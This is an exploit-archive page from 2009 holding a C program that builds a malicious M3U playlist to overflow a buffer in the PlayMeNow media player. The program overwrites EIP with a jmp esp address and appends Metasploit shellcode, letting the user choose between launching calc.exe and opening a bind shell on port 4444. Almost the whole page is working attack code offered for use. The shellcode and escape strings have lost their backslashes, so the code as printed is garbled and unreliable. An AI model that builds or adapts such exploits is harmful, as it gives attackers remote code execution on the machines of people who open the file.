PlayMeNow Malformed M3U Playlist File Buffer

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : PlayMeNow Malformed M3U Playlist File Buffer
# Published : 2009-12-19
# Author : Gr33nG0bL1n
# Previous Title : PlayMeNow Malformed M3U Playlist Buffer Overflow(SEH)
# Next Title : PHP 5.2.12/5.3.1 symlink() open_basedir bypass
/*
	[+] Vulnerability:			PlayMeNow Malformed M3U Playlist File Buffer Overflow 
	[+] Product:				PlayMeNow - media player.
	[+] Versions affected:		Tested with 7.3 and 7.4
	[+] Tested on:				Windows XP Professional with Service Pack 2
	[+] Author:					Gr33nG0bL1n
	[+] Software Link:			http://playmenow.gooofull.com/ 
	[+] Date:				19/12/2009
	[+] Usage:					Just choose your shellcode and open the created file(PlayMeNow_expl.m3u) with PlayMeNow.
	

Started Like this:
			EAX 00000000
			ECX 7C80C755 kernel32.7C80C755
			EDX 00000000
			EBX 00000000
			ESP 0012F5B8 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
			EBP 0012FAE8 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
			ESI 00194810
			EDI 001A4600
			EIP 41414141
	
Ended with this:
			exploit : [A x 1040] +[EIP - jmp esp] + [Nops -20] + [Shellcode]
*/

#include<stdio.h>
#include<string.h>
#include<stdlib.h>
#include<windows.h>


/*
	windows/exec
	http://www.metasploit.com
	Encoder: x86/shikata_ga_nai
	EXITFUNC=thread, CMD=calc
*/
char calc_shcode[] =	"x31xc9xdaxd4xb1x33xbdxecx71x94xdexd9x74x24xf4"
						"x5fx31x6fx15x03x6fx15x83x2bx75x76x2bx4fx9exff"
						"xd4xafx5fx60x5cx4ax6exb2x3ax1fxc3x02x48x4dxe8"
						"xe9x1cx65x7bx9fx88x8axccx2axefxa5xcdx9ax2fx69"
						"x0dxbcxd3x73x42x1exedxbcx97x5fx2axa0x58x0dxe3"
						"xafxcbxa2x80xedxd7xc3x46x7ax67xbcxe3xbcx1cx76"
						"xedxecx8dx0dxa5x14xa5x4ax16x25x6ax89x6ax6cx07"
						"x7ax18x6fxc1xb2xe1x5ex2dx18xdcx6fxa0x60x18x57"
						"x5bx17x52xa4xe6x20xa1xd7x3cxa4x34x7fxb6x1ex9d"
						"x7ex1bxf8x56x8cxd0x8ex31x90xe7x43x4axacx6cx62"
						"x9dx25x36x41x39x6execxe8x18xcax43x14x7axb2x3c"
						"xb0xf0x50x28xc2x5ax3exafx46xe1x07xafx58xeax27"
						"xd8x69x61xa8x9fx75xa0x8dx40x94x61xfbxe8x01xe0"
						"x46x75xb2xdex84x80x31xebx74x77x29x9ex71x33xed"
						"x72x0bx2cx98x74xb8x4dx89x16x5fxdex51xf7xfax66"
						"xf3x07";


/*
	windows/shell_bind_tcp
	http://www.metasploit.com
	Encoder: x86/shikata_ga_nai
	EXITFUNC=thread, LPORT=4444, RHOST=
*/
char bind_shcode[] =	"x31xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13xf7"
						"x82xf8x80x83xebxfcxe2xf4x0bxe8x13xcdx1fx7bx07x7f"
						"x08xe2x73xecxd3xa6x73xc5xcbx09x84x85x8fx83x17x0b"
						"xb8x9ax73xdfxd7x83x13xc9x7cxb6x73x81x19xb3x38x19"
						"x5bx06x38xf4xf0x43x32x8dxf6x40x13x74xccxd6xdcxa8"
						"x82x67x73xdfxd3x83x13xe6x7cx8exb3x0bxa8x9exf9x6b"
						"xf4xaex73x09x9bxa6xe4xe1x34xb3x23xe4x7cxc1xc8x0b"
						"xb7x8ex73xf0xebx2fx73xc0xffxdcx90x0exb9x8cx14xd0"
						"x08x54x9exd3x91xeaxcbxb2x9fxf5x8bxb2xa8xd6x07x50"
						"x9fx49x15x7cxccxd2x07x56xa8x0bx1dxe6x76x6fxf0x82"
						"xa2xe8xfax7fx27xeax21x89x02x2fxafx7fx21xd1xabxd3"
						"xa4xd1xbbxd3xb4xd1x07x50x91xeaxe9xdcx91xd1x71x61"
						"x62xeax5cx9ax87x45xafx7fx21xe8xe8xd1xa2x7dx28xe8"
						"x53x2fxd6x69xa0x7dx2exd3xa2x7dx28xe8x12xcbx7exc9"
						"xa0x7dx2exd0xa3xd6xadx7fx27x11x90x67x8ex44x81xd7"
						"x08x54xadx7fx27xe4x92xe4x91xeax9bxedx7ex67x92xd0"
						"xaexabx34x09x10xe8xbcx09x15xb3x38x73x5dx7cxbaxad"
						"x09xc0xd4x13x7axf8xc0x2bx5cx29x90xf2x09x31xeex7f"
						"x82xc6x07x56xacxd5xaaxd1xa6xd3x92x81xa6xd3xadxd1"
						"x08x52x90x2dx2ex87x36xd3x08x54x92x7fx08xb5x07x50"
						"x7cxd5x04x03x33xe6x07x56xa5x7dx28xe8x07x08xfcxdf"
						"xa4x7dx2ex7fx27x82xf8x80";


int main ( int argc , char * argv[])

{

	FILE *fp;
	char *EIP = "x5Dx38x82x7C"; //KERNEL32.DLL
	int i;
	int sc_opt =0;


	system("cls");
	printf("t. .. ...PlayMeNow 7.4 m3u File Buffer Overflow... .. .rn");
	printf("Usage:rn");
	printf("t[1] execute calc.exen");
	printf("t[2] execute bindshell LPORT=4444nn");


	printf("Choose shellcode: <1/2>rn");
	scanf("%d" , &sc_opt );

	if( (fp=fopen("PlayMeNow_expl.m3u","wb")) ==NULL )
	{
         perror("cannot open expl file!");
         exit(0);
	}


	switch(sc_opt)
	{
		case 1:
				for (i=0; i<1040; i++)
				{
					fwrite("x41", 1, 1, fp);  //Junk
				}
				
				fwrite(EIP, 4, 1, fp); // We are flying baby.....

				for (i=0; i<20; i++)
				{
					fwrite("x90", 1, 1, fp);// Nop's
				}
									   
				fwrite(calc_shcode, sizeof(calc_shcode), 1, fp); //Party Time

				fclose(fp);
                printf("[+] PlayMeNow_expl.m3u Createdrn");
				printf("[+] Shellcode: Calc.exern");
				printf("[+] Enjoyrn");
				printf("[+] Exploited By Gr33nG0bL1nrn");
				break;
                   
        case 2:
				for (i=0; i<1040; i++)
				{
					fwrite("x41", 1, 1, fp);// Junk
				}
				
				fwrite(EIP, 4, 1, fp); // We are flying baby.....

				for (i=0; i<20; i++)
				{
					fwrite("x90", 1, 1, fp); //Nop's
				}
									   
				fwrite(bind_shcode, sizeof(bind_shcode), 1, fp); //Party Time

				fclose(fp);
                printf("[+] PlayMeNow_expl.m3u Createdrn");
				printf("[+] Shellcode: bindshell port 4444rn");
				printf("[+] Enjoyrn");
				printf("[+] Exploited By Gr33nG0bL1nrn");
                break;
    }
	return 0;
			
}